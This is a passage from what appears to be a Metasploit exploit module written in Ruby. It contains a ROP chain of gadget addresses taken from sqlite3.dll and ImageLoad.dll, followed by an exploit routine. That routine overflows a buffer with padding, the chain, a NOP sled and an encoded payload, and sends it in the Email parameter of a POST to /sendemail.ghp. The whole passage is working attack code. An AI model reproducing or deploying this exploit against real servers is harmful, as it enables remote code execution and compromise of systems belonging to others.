        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x1001bd98,  # POP ECX # RETN [ImageLoad.dll]
        0x1004de84,  # &Writable location [ImageLoad.dll]
        0x61c373a4,  # POP EDI # RETN [sqlite3.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x90909090,  # nop
        0x100240c2,  # PUSHAD # RETN [ImageLoad.dll]
    ].flatten.pack('V*')
    return rop_gadgets
  end
  def exploit
    sploit = rand_text_alpha_upper(2278)
    rop_chain = create_rop_chain
    sploit << rop_chain
    sploit << "\x90" * 200
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(1794 - 200 - payload.encoded.length - rop_chain.length)
    sploit << [target.ret].pack('V')
    request = "POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=#{sploit}&getPassword=Get+Password"
    connect
    sock.put(request)
    handler
    disconnect
  end
 end